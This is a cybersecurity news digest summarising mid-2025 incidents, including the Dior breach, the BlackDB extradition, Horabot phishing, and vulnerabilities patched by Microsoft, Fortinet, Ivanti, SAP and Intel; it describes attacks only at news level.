Daily Brief

Dior disclosed a cyberattack that compromised customer information from their Fashion and Accessories segments. The breach was identified on May 7; however, passwords or payment details weren't exposed as they were stored separately. Personal contact details, purchase history, and preferences are among the data exposed. Customers from Korea and China have been specifically notified, suggesting the breach had a significant regional impact. Dior has engaged top cybersecurity experts to further investigate and mitigate the incident. The brand is contacting regulators and impacted customers following legal requirements. Dior advises customers to stay alert for potential phishing scams that may impersonate the brand. The breach has led to some legal scrutiny in Korea regarding timely notifications to authorities.

Kosovo has extradited Liridon Masurica, the administrator of the BlackDB cybercrime marketplace, to the United States to face multiple cybercrime charges. Masurica was arrested by Kosovar authorities on December 14th, 2024, and extradited on May 9th, after being active in cybercrime since 2018. He appeared before United States Magistrate Judge Lindsay Saxe Griffin and faces five counts of using unauthorized access devices and one count of conspiracy. BlackDB.cc sold stolen credit card data, server credentials, and personal information, primarily affecting U.S. citizens. Purchasers of this data reportedly engaged in credit card fraud, tax fraud, and identity theft. The FBI collaborated closely with Kosovo Police's Cybercrime Investigation Directorate and received additional support from the FBI’s Legal Attaché Office in Sofia and the Department of Justice's Office of International Affairs. Following related investigations, law enforcement recently seized the Rydox cybercrime marketplace and arrested its three Kosovo administrators. If convicted on all counts, Masurica could face up to 55 years in federal prison.

Craig Lawson, Research Vice President at Gartner, advised against rushing to apply patches from Patch Tuesday, suggesting it doesn't necessarily lower risk. During a conference, Lawson highlighted that no large organization he spoke with, including hyperscalers and government agencies, has successfully kept up with all necessary security patches. Lawson introduced the concept of "threat debt," which is the accumulation of known but unaddressed security vulnerabilities. He argued that speeding up patching processes isn't an effective solution. He emphasized that only a small percentage (8-9%) of vulnerabilities are actually exploited by cybercriminals, and these often aren't the ones deemed critical. The analyst mentioned that patches can sometimes cause more issues, either by breaking systems or being too complex to implement effectively. Lawson suggested organizations should develop a "cohabitation metric" to assess how well they can manage with unpatched systems by implementing compensating controls. He advocated for a more tailored approach to patching, based on specific organizational needs and the practicality of implementing certain patches, encouraging cross-departmental collaboration.

Earth Ammit, linked to Chinese-speaking nation-state groups, conducted espionage targeting Taiwan and South Korea's military, satellite, and other sectors through 2023-2024. The VENOM campaign focused on software service providers, exploiting web server vulnerabilities to install RATs and harvest credentials. TIDRONE campaign, revealed by Trend Micro, utilized custom malware like CXCLNT and CLNTEND to attack drone manufacturers and military industries. Both campaigns involved sophisticated uses of ERP software to infiltrate the drone supply chain and leveraged trusted communication tools for distributing malware. The attackers used a combination of open-source tools and bespoke malware to obscure their activities and facilitate staged intrusions. Shared victims, service providers, and command-and-control infrastructures indicate a coordinated effort between the VENOM and TIDRONE campaigns. Trend Micro associated the tactics, techniques, and procedures of Earth Ammit with another Chinese hacking group, suggesting a shared toolkit and strategic approach.

Cybersecurity experts have uncovered a new phishing campaign distributing Horabot malware across six Latin American nations targeting Windows users. Malicious emails impersonating invoices or financial documents are used to trick users into opening attachments that compromise email credentials, contact lists, and install banking trojans. The malware conducts extensive activities, including system reconnaissance and credential theft using VBScript, AutoIt, and PowerShell scripts. Horabot was first identified in 2023 and is believed to be operated by a Brazilian threat actor, focusing on Spanish-speaking users since November 2020. The phishing mechanism starts with a deceiving email containing a ZIP file that masquerades as a PDF but actually holds a malicious HTML file leading to further malware downloads. Once the system is infected, the malware steals data from multiple browsers and displays fake pop-ups to capture more user login details. The malware avoids detection by terminating itself if Avast antivirus is present or if running in a virtual environment, enhancing its persistence and spread. Following infection, the malware also leverages compromised systems to propagate phishing emails through Outlook, perpetuating the cycle of infection.

Verizon's 2025 Data Breach Investigations Report indicates an 18% year-over-year increase in confirmed data breaches, with exploitation techniques rising by 34%. Many organizations are responding to the increase in cyberattacks by investing in both security tools and compliance standards, although these alone are not sufficient to fully mitigate cyber risks. Effective cybersecurity underscored by the need for offensive security training across all roles within security teams to understand and anticipate attacker behaviors and strategies. This training empowers non-offensive roles such as new practitioners, incident handlers, forensic analysts, and security managers with insights into how attackers operate, enhancing their effectiveness in their respective positions. Hands-on offensive operations training allows security professionals to gain practical experience with common attack methods, enhancing their ability to identify risks, prioritize responses, and improve overall security strategies. Security managers benefit significantly from understanding offensive techniques, aiding them in better strategic decision-making and risk management. Ultimately, continuous learning and adaptation to new cybersecurity challenges through such training can strengthen an organization's defensive posture significantly.

Peter Garraghan highlighted at CYBERUK conference the lack of security awareness in AI deployments among organizations. The NCSC's recent report warns of AI systems increasing vulnerability potential in critical systems by 2027 if not properly secured. AI deployment is often prioritized for competitive market share over implementing necessary security measures. The report identifies prompt injections and supply chain attacks as major threats facilitated by AI. Garraghan’s firm exploited vulnerabilities in a candle shop’s AI chatbot, demonstrating potential severe risks. The NCSC emphasized the importance of incorporating cybersecurity in AI to mitigate risks of advanced cyberattacks. Current AI deployments could potentially expose organizations to data theft and other cyber exploitations if not managed correctly. The NCSC continues to develop guidance for organizations to strengthen cybersecurity in the era of AI advancements.

Microsoft issued updates for 78 security flaws, 11 of which are critical. Five zero-day vulnerabilities were actively exploited, prompting immediate patches. Patches cover various issues including remote code execution and privilege escalation. Notable among the fixes is CVE-2025-29813, a critical bug in Azure DevOps Server with a CVSS score of 10.0. Among the exploited flaws, attackers targeted components like Microsoft Scripting Engine and DWM Core Library. CISA has mandated federal agencies to apply these fixes by June 3, 2025, highlighting the severity. Microsoft also fixed security flaws in products like Edge, and other vendors released patches for additional vulnerabilities. Enhanced focus on improving security posture as new vulnerabilities allow network privilege escalation and data theft.

Ransomware attacks are increasingly targeting the intermediary systems between IT and operational technology (OT) in critical infrastructure sectors. These middle systems are seen as vulnerable spots, less guarded than core IT or heavy industrial OT systems. Attackers focus on these systems due to the higher likelihood of companies paying ransoms due to the operational impact and potential safety risks. Examples include potential manipulation of pharmaceutical labeling led to life-threatening errors. The SANS Institute has identified increased ransomware activities as a significant threat, especially when it involves IT systems related to critical services like healthcare and utilities. Nation-state actors, notably from Russia, China, and Iran, are also intensively targeting these critical infrastructures for more destructive purposes. The experts suggest a shift from recovery-focused defenses to early detection strategies to counteract the manipulation of critical systems.

Fortinet has addressed a critical zero-day vulnerability, CVE-2025-32756, with a CVSS score of 9.6, affecting multiple products including FortiVoice. The stack-based overflow vulnerability allows remote unauthenticated attackers to execute arbitrary code via crafted HTTP requests. The flaw has actively been exploited in attacks specifically targeting FortiVoice enterprise phone systems. Attackers utilized the vulnerability to perform network scans, erase crash logs, and enable debugging features to intercept credentials. Products impacted include FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera. Fortinet's product security team discovered the flaw following suspicious activity from specific IP addresses. Users are urged to patch affected systems immediately or disable the HTTP/HTTPS administrative interface as a temporary measure if patching is delayed.

Ivanti has issued updates for two critical vulnerabilities in its Endpoint Manager Mobile (EPMM) software that enable remote code execution. These vulnerabilities were linked to two open-source libraries used in EPMM, though the specific libraries weren't disclosed. A very limited number of customers have reportedly been affected by these exploits, according to Ivanti. The vulnerabilities affect only the on-premises version of EPMM and not other Ivanti products like Ivanti Neurons for MDM or Ivanti Sentry. Ivanti recommends that the risk can be significantly mitigated by filtering access to the API via built-in Portal ACLs or an external web application firewall. Additionally, Ivanti released patches for an unrelated authentication bypass issue in on-premise Neurons for ITSM, which also poses severe risks but has not been exploited. Users are encouraged to update their Ivanti software instances promptly to prevent potential exploits by threat actors.

Microsoft disclosed five actively exploited vulnerabilities, emphasizing the need for immediate patching across Windows platforms and servers. Significantly, Microsoft’s Azure platform also demanded attention with three notable vulnerabilities addressed, including a critical authentication bypass in its DevOps platform. Adobe released patches targeting critical flaws in multiple applications, such as Photoshop and Illustrator, capable of arbitrary code execution. Apple's patch round included a fix for an exploited flaw in its watchOS and a broad series of updates across various platforms including iOS, macOS, and Safari, targeting both security improvements and bug fixes. SAP revealed 18 new fixes, including re-releases for critical vulnerabilities affecting its NetWeaver platform. Ivanti introduced patches for critical and high-severity vulnerabilities in their products, emphasizing security enhancements for ITSM and Cloud Services Application. The collective updates underscore a widespread and proactive effort by tech firms to mitigate vulnerabilities amidst rising security threats.

Researchers from ETH Zurich have identified a new class of vulnerabilities, named Branch Predictor Race Conditions (BPRC), that circumvent Intel's defenses against Spectre vulnerabilities. The new exploit, called Branch Privilege Injection (BPI), enables unprivileged code to mimic kernel-level branch predictions, effectively bypassing Intel’s Indirect Branch Restricted Speculation and Indirect Branch Predictor Barrier. This vulnerability affects all Intel x86 processors since the 9th generation and has implications for both individual computers and cloud services by potentially allowing malicious programs to access sensitive data across different security domains. Intel has released a microcode update to mitigate the newly discovered vulnerabilities and has seen a performance impact of up to 2.7% during mitigation tests. Despite these patches, the fundamental issue related to speculative execution remains a challenge, and vulnerabilities like Spectre are likely to persist as long as this method is used in CPU design. AMC and ARM chips are reportedly not affected by this specific vulnerability. Intel encourages users to contact their system manufacturers for the appropriate updates and continues to enhance its hardware mitigations against such speculative execution vulnerabilities.

SAP released patches for a newly exploited zero-day vulnerability in its NetWeaver servers. The patch addresses vulnerabilities discovered during investigations of prior attacks leveraging a different zero-day flaw fixed in April. Cybersecurity firms linked attacks exploiting these vulnerabilities to a Chinese threat actor and observed significant compromises in Fortune 500 companies. Attackers used a combination of unauthorized file uploads and insecure deserialization to execute commands remotely on affected systems. SAP has urged customers to update their systems promptly and monitor any suspicious server activity. The United States Cybersecurity and Infrastructure Security Agency (CISA) has included the previous flaw in its Known Exploited Vulnerabilities Catalog, requiring federal agencies to secure their systems swiftly. Over 2000 SAP NetWeaver servers remain exposed online, posing risks of further attacks.

The Trump administration is poised to accept a $400 million luxury Boeing 747-8 from the royal family of Qatar, intended as a temporary Air Force One. Retrofitting the aircraft to meet U.S. presidential security standards could take years and be extremely costly, potentially interfering with the ongoing program to replace the current VC-25A aircraft. Security experts question the practicability of adapting a foreign-owned jet, citing massive expenses and the need for advanced security measures—such as in-flight refueling capabilities and fortified hull and windows. The aircraft is set to be transferred to Trump’s presidential library foundation after his term, raising legal and ethical issues regarding the acceptance of such a valuable gift from a foreign power. Retrofitting would include intensive inspections and replacements in communications, engines, and security systems to guard against electronic and physical threats. There are concerns about potential espionage risks, as foreign actors could embed surveillance devices; extensive countermeasures would be required to ensure complete security. If accepted, the aircraft might not be operational until after Trump’s office term, making the arrangement impractical despite its initial no-cost appeal.